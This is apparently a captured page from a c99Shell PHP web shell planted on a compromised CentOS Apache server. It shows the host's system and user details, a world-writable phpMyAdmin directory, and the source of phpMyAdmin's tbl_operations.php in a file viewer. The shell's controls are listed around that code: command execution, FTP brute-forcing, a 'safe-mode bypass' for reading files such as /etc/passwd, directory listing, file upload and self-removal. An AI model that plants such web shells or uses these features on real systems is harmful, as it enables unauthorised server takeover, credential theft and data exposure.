!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 52.61 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tbl_operations.php (30.77 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
rename($_REQUEST['new_name'])) { $_message .= $pma_table->getLastMessage(); $result = true; $GLOBALS['table'] = $pma_table->getName(); $reread_info = true; $reload = true; } else { $_message .= $pma_table->getLastError(); $result = false; } } if (isset($_REQUEST['comment']) && urldecode($_REQUEST['prev_comment']) !== $_REQUEST['comment']) { $table_alters[] = 'COMMENT = \'' . PMA_sqlAddslashes($_REQUEST['comment']) . '\''; } if (! empty($_REQUEST['new_tbl_type']) && strtolower($_REQUEST['new_tbl_type']) !== strtolower($tbl_type)) { $table_alters[] = 'ENGINE = ' . $_REQUEST['new_tbl_type']; $tbl_type = $_REQUEST['new_tbl_type']; // reset the globals for the new engine PMA_set_global_variables_for_engine($tbl_type); if ($is_aria) { $transactional = (isset($transactional) && $transactional == '0') ? '0' : '1'; $page_checksum = (isset($page_checksum)) ? $page_checksum : ''; } } if (! empty($_REQUEST['tbl_collation']) && $_REQUEST['tbl_collation'] !== $tbl_collation) { $table_alters[] = 'DEFAULT ' . PMA_generateCharsetQueryPart($_REQUEST['tbl_collation']); } if (($is_myisam_or_aria || $is_isam) && isset($_REQUEST['new_pack_keys']) && $_REQUEST['new_pack_keys'] != (string)$pack_keys) { $table_alters[] = 'pack_keys = ' . $_REQUEST['new_pack_keys']; } $checksum = empty($checksum) ? '0' : '1'; $_REQUEST['new_checksum'] = empty($_REQUEST['new_checksum']) ? '0' : '1'; if ($is_myisam_or_aria && $_REQUEST['new_checksum'] !== $checksum) { $table_alters[] = 'checksum = ' . $_REQUEST['new_checksum']; } $_REQUEST['new_transactional'] = empty($_REQUEST['new_transactional']) ? '0' : '1'; if ($is_aria && $_REQUEST['new_transactional'] !== $transactional) { $table_alters[] = 'TRANSACTIONAL = ' . $_REQUEST['new_transactional']; } $_REQUEST['new_page_checksum'] = empty($_REQUEST['new_page_checksum']) ? '0' : '1'; if ($is_aria && $_REQUEST['new_page_checksum'] !== $page_checksum) { $table_alters[] = 'PAGE_CHECKSUM = ' . $_REQUEST['new_page_checksum']; } $delay_key_write = empty($delay_key_write) ? '0' : '1'; $_REQUEST['new_delay_key_write'] = empty($_REQUEST['new_delay_key_write']) ? '0' : '1'; if ($is_myisam_or_aria && $_REQUEST['new_delay_key_write'] !== $delay_key_write) { $table_alters[] = 'delay_key_write = ' . $_REQUEST['new_delay_key_write']; } if (($is_myisam_or_aria || $is_innodb || $is_pbxt) && ! empty($_REQUEST['new_auto_increment']) && (! isset($auto_increment) || $_REQUEST['new_auto_increment'] !== $auto_increment)) { $table_alters[] = 'auto_increment = ' . PMA_sqlAddslashes($_REQUEST['new_auto_increment']); } if (($is_myisam_or_aria || $is_innodb || $is_pbxt) && ! empty($_REQUEST['new_row_format']) && (! isset($row_format) || strtolower($_REQUEST['new_row_format']) !== strtolower($row_format))) { $table_alters[] = 'ROW_FORMAT = ' . PMA_sqlAddslashes($_REQUEST['new_row_format']); } if (count($table_alters) > 0) { $sql_query = 'ALTER TABLE ' . PMA_backquote($GLOBALS['table']); $sql_query .= "\r\n" . implode("\r\n", $table_alters); $result .= PMA_DBI_query($sql_query) ? true : false; $reread_info = true; unset($table_alters); foreach (PMA_DBI_get_warnings() as $warning) { // In MariaDB 5.1.44, when altering a table from Maria to MyISAM // and if TRANSACTIONAL was set, the system reports an error; // I discussed with a Maria developer and he agrees that this // should not be reported with a Level of Error, so here // I just ignore it. But there are other 1478 messages // that it's better to show. if (! ($_REQUEST['new_tbl_type'] == 'MyISAM' && $warning['Code'] == '1478' && $warning['Level'] == 'Error')) { $warning_messages[] = $warning['Level'] . ': #' . $warning['Code'] . ' ' . $warning['Message']; } } } } /** * Reordering the table has been requested by the user */ if (isset($_REQUEST['submitorderby']) && ! empty($_REQUEST['order_field'])) { $sql_query = ' ALTER TABLE ' . PMA_backquote($GLOBALS['table']) . ' ORDER BY ' . PMA_backquote(urldecode($_REQUEST['order_field'])); if (isset($_REQUEST['order_order']) && $_REQUEST['order_order'] === 'desc') { $sql_query .= ' DESC'; } $result = PMA_DBI_query($sql_query); } // end if /** * A partition operation has been requested by the user */ if (isset($_REQUEST['submit_partition']) && ! empty($_REQUEST['partition_operation'])) { $sql_query = 'ALTER TABLE ' . PMA_backquote($GLOBALS['table']) . ' ' . $_REQUEST['partition_operation'] . ' PARTITION ' . $_REQUEST['partition_name']; $result = PMA_DBI_query($sql_query); } // end if if ($reread_info) { // to avoid showing the old value (for example the AUTO_INCREMENT) after // a change, clear the cache PMA_Table::$cache = array(); $page_checksum = $checksum = $delay_key_write = 0; require './libraries/tbl_info.inc.php'; } unset($reread_info); /** * Displays top menu links */ require_once './libraries/tbl_links.inc.php'; if (isset($result) && empty($message_to_show)) { // set to success by default, because result set could be empty // (for example, a table rename) $_type = 'success'; if (empty($_message)) { $_message = $result ? __('Your SQL query has been executed successfully') : __('Error'); // $result should exist, regardless of $_message $_type = $result ? 'success' : 'error'; } if (! empty($warning_messages)) { $_message = new PMA_Message; $_message->addMessages($warning_messages); $_message->isError(true); unset($warning_messages); } PMA_showMessage($_message, $sql_query, $_type); unset($_message, $_type); } $url_params['goto'] = 'tbl_operations.php'; $url_params['back'] = 'tbl_operations.php'; /** * Get columns names */ $local_query = ' SHOW COLUMNS FROM ' . PMA_backquote($GLOBALS['table']) . ' FROM ' . PMA_backquote($GLOBALS['db']); $columns = PMA_DBI_fetch_result($local_query, null, 'Field'); unset($local_query); /** * Displays the page */ ?>
.table):'); ?> databases) > $GLOBALS['cfg']['MaxDbList']) { ?>  . 

5.0.4, >4.1.12 and >4.0.11, so I decided not to // check for version ?>
0 && ($is_myisam_or_aria || $is_innodb || $is_pbxt)) { ?> array( 'FIXED' => 'FIXED', 'DYNAMIC' => 'DYNAMIC', 'PAGE' => 'PAGE' ), 'MARIA' => array( 'FIXED' => 'FIXED', 'DYNAMIC' => 'DYNAMIC', 'PAGE' => 'PAGE' ), 'MYISAM' => array( 'FIXED' => 'FIXED', 'DYNAMIC' => 'DYNAMIC' ), 'PBXT' => array( 'FIXED' => 'FIXED', 'DYNAMIC' => 'DYNAMIC' ), 'INNODB' => array( 'COMPACT' => 'COMPACT', 'REDUNDANT' => 'REDUNDANT') ); $innodb_engine_plugin = PMA_StorageEngine::getEngine('innodb'); $innodb_plugin_version = $innodb_engine_plugin->getInnodbPluginVersion(); if (!empty($innodb_plugin_version)) { $innodb_file_format = $innodb_engine_plugin->getInnodbFileFormat(); } else { $innodb_file_format = ''; } if ('Barracuda' == $innodb_file_format && $innodb_engine_plugin->supportsFilePerTable()) { $possible_row_formats['INNODB']['DYNAMIC'] = 'DYNAMIC'; $possible_row_formats['INNODB']['COMPRESSED'] = 'COMPRESSED'; } unset($innodb_engine_plugin, $innodb_plugin_version, $innodb_file_format); // for MYISAM there is also COMPRESSED but it can be set only by the // myisampack utility, so don't offer here the choice because if we // try it inside an ALTER TABLE, MySQL (at least in 5.1.23-maria) // does not return a warning // (if the table was compressed, it can be seen on the Structure page) if (isset($possible_row_formats[$tbl_type])) { $current_row_format = strtoupper($showtable['Row_format']); echo ''; echo ''; echo ''; } ?>
/>
/>
/>
/>
'; echo PMA_generate_html_dropdown('new_row_format', $possible_row_formats[$tbl_type], $current_row_format, 'new_row_format'); unset($possible_row_formats, $current_row_format); echo '
.table):'); ?> databases) > $GLOBALS['cfg']['MaxDbList']) { ?>  . 
__('Structure only'), 'data' => __('Structure and data'), 'dataonly' => __('Data only')); PMA_display_html_radio('what', $choices, 'data', true); unset($choices); ?>


/>

    'CHECK TABLE ' . PMA_backquote($GLOBALS['table']), 'table_maintenance' => 'Go', )); ?>
    • 'ALTER TABLE ' . PMA_backquote($GLOBALS['table']) . ' ENGINE = InnoDB')); ?>
    • 'ANALYZE TABLE ' . PMA_backquote($GLOBALS['table']), 'table_maintenance' => 'Go', )); ?>
    • 'REPAIR TABLE ' . PMA_backquote($GLOBALS['table']), 'table_maintenance' => 'Go', )); ?>
    • 'OPTIMIZE TABLE ' . PMA_backquote($GLOBALS['table']), 'table_maintenance' => 'Go', )); ?>
    • 'FLUSH TABLE ' . PMA_backquote($GLOBALS['table']), 'message_to_show' => sprintf(__('Table %s has been flushed'), htmlspecialchars($GLOBALS['table'])), 'reload' => 1, )); ?>
    $this_sql_query, 'goto' => 'tbl_structure.php', 'reload' => '1', 'message_to_show' => sprintf(__('Table %s has been emptied'), htmlspecialchars($table)), )); ?>
    • $this_sql_query, 'goto' => 'db_operations.php', 'reload' => '1', 'purge' => '1', 'message_to_show' => sprintf(($tbl_is_view ? __('View %s has been dropped') : __('Table %s has been dropped')), htmlspecialchars($table)), // table name is needed to avoid running // PMA_relationsCleanupDatabase() on the whole db later 'table' => $GLOBALS['table'], )); ?>
' . "\n"; foreach($partition_names as $one_partition) { $one_partition = htmlspecialchars($one_partition); $html_select .= '' . "\n"; } $html_select .= '' . "\n"; printf(__('Partition %s'), $html_select); unset($partition_names, $one_partition, $html_select); $choices = array( 'ANALYZE' => __('Analyze'), 'CHECK' => __('Check'), 'OPTIMIZE' => __('Optimize'), 'REBUILD' => __('Rebuild'), 'REPAIR' => __('Repair')); PMA_display_html_radio('partition_operation', $choices, '', false); unset($choices); echo PMA_showMySQLDocu('partitioning_maintenance', 'partitioning_maintenance'); // I'm not sure of the best way to display that; this link does // not depend on the Go button $this_url_params = array_merge($url_params, array( 'sql_query' => 'ALTER TABLE ' . PMA_backquote($GLOBALS['table']) . ' REMOVE PARTITIONING' )); ?>
    $arr) { $join_query = 'SELECT ' . PMA_backquote($GLOBALS['table']) . '.* FROM ' . PMA_backquote($GLOBALS['table']) . ' LEFT JOIN ' . PMA_backquote($arr['foreign_table']); if ($arr['foreign_table'] == $GLOBALS['table']) { $foreign_table = $GLOBALS['table'] . '1'; $join_query .= ' AS ' . PMA_backquote($foreign_table); } else { $foreign_table = $arr['foreign_table']; } $join_query .= ' ON ' . PMA_backquote($GLOBALS['table']) . '.' . PMA_backquote($master) . ' = ' . PMA_backquote($foreign_table) . '.' . PMA_backquote($arr['foreign_field']) . ' WHERE ' . PMA_backquote($foreign_table) . '.' . PMA_backquote($arr['foreign_field']) . ' IS NULL AND ' . PMA_backquote($GLOBALS['table']) . '.' . PMA_backquote($master) . ' IS NOT NULL'; $this_url_params = array_merge($url_params, array('sql_query' => $join_query)); echo '
  • ' . '' . $master . ' -> ' . $arr['foreign_table'] . '.' . $arr['foreign_field'] . '
    • ' . "\n"; } // foreach $foreign unset($foreign_table, $join_query); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--